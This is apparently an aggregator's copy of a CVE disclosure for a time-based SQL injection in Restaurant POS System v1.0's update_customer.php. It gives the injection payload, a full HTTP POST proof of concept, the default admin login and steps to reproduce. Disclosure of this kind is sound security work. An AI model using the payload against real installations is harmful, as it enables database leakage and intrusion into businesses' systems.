Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-43086: CVE_Hunter/SQLi-4.md at main · Tr0e/CVE_Hunter

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via update_customer.php.

CVE
Open in Source
#sql#vulnerability#web#windows#apple#php#auth#chrome#webkit

Vulnerability Description

Restaurant POS System v1.0 was discovered to contain a SQL injection vulnerability via the update_customer.php. It is an open source project from campcodes.com. This vulnerability can lead to database information leakage.

  1. Vulnerability Submitter: Tr0e
  2. vendors: Restaurant POS System in PHP with Source Code - CodeAstro
  3. The program is built using the xmapp/v3.3.0 and PHP/8.1.10 version;
  4. Vulnerability location: /RestaurantPOS/Restro/admin/update_customer.php

Vulnerability Verification

[+] Payload:

test’and(select*from(select+sleep(3))a/**/union/**/select+1)=’

POC:

POST http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158’and(select*from(select+sleep(3))a/**/union/**/select+1)=’ HTTP/1.1 Host: 192.168.0.120:91 Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.0.120:91 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.120:91/RestaurantPOS/Restro/admin/update_customer.php?update=dac2ad667158 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=ldi7mdlvm8g7bnfhunuvrhp8ne Connection: close

customer_name=Yao&customer_phoneno=13011113333&customer_email=123%40qq.com&customer_password=123456&updateCustomer=Update+Customer

How to verify

  1. Build the vulnerability environment according to the steps provided by the source code author ;
  2. log in to the "Admin Panel” through the default account and password(Email: [email protected] Password: codeastro.com);
  3. The vulnerability is located at the “Customers - Update” function, you should inserts Payload when you Update any customer’s information,as shown in the following figure:

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE